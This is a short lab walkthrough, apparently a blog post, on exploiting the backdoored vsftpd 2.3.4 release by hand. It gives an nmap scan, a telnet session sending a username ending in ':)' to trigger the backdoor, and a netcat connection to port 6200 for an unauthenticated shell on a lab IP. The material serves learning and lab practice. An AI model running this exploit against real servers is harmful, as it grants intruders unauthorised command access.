vsftpd, (or very secure FTP daemon) is an FTP server for Unix-like systems, including Linux, vsftpd is the default FTP server in the Ubuntu, CentOS, Fedora, NimbleX, Slackware and RHEL Linux distributions.
nmap -p0-65535 192.168.2.129
root@kali:~# telnet 192.168.2.129 21 Trying 192.168.2.129... Connected to 192.168.2.129. Escape character is '^]'. 220 (vsFTPd 2.3.4)
In July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been compromised. Users logging into a compromised vsftpd-2.3.4 server may issue a “: )” smileyface as the username and gain a command shell on port 6200. This was not an issue of a security hole in vsftpd, instead, someone[clarification needed] had uploaded a different version of vsftpd which contained a backdoor. Since then, the site was moved to Google App Engine.
Lets try to exploit without metasploit.
Try to connect the vsFTPd server using USER name and PASS
Note : User name should end with smiley “: ) ” 🙂
Whenever user connect to the vsFTPd server smiley it will opens the backdoor connection and enables the port 6200 in ftp server.
root@kali:~# telnet 192.168.2.129 21 Trying 192.168.2.129... Connected to 192.168.2.129. Escape character is '^]'. 220 (vsFTPd 2.3.4) USER invalid: ) 331 Please specify the password. PASS dont know ^] telnet> quit Connection closed.
Close the telnet session and connect it back to 6200 port using netcat or telnet.
nc 192.168.2.129 6200
telnet 192.168.2.129 6200
It will allows the user to connect the vsFTPd server without authentication.